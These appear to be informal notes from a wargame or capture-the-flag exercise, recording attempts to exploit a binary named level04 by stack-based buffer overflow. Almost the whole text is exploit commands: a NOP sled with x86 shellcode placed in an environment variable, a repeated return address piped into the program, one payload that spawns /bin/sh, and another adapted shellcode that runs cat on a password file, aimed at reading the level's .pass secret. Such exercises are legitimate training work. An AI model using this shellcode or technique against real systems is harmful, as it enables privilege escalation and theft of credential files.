We can try shellcode into the child, but we probably won't have access to the terminal, but we can try
a custom shecode that just cat the .pass
sh -c "cat /home/users/level04/.pass"

sheellcode env start address: 0xffffdb8c
+ 500 = 0xFFFFDD80

since we cannot debug using gdb, just mass print 0xFFFFDD80 and see if it works

env -i SHELL="/bin/bash" PWD="$HOME" SHELLCODE="$(python -c 'print "\x90"*1000 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')" ./level04 < <(python -c 'print "\x80\xdd\xff\xff"*42')

42 gives "no sheellcodee for you"
but 39 does a strange behavior
now try with sheellcode that only does cat

based on this:
https://shell-storm.org/shellcode/files/shellcode-99.html

\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61\x73\x73\x77\x64

env -i SHELL="/bin/bash" PWD="$HOME" SHELLCODE="$(python -c 'print "\x90"*1000 + "\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61\x73\x73\x77\x64"')" ./level04 < <(python -c 'print "\x80\xdd\xff\xff"*39')
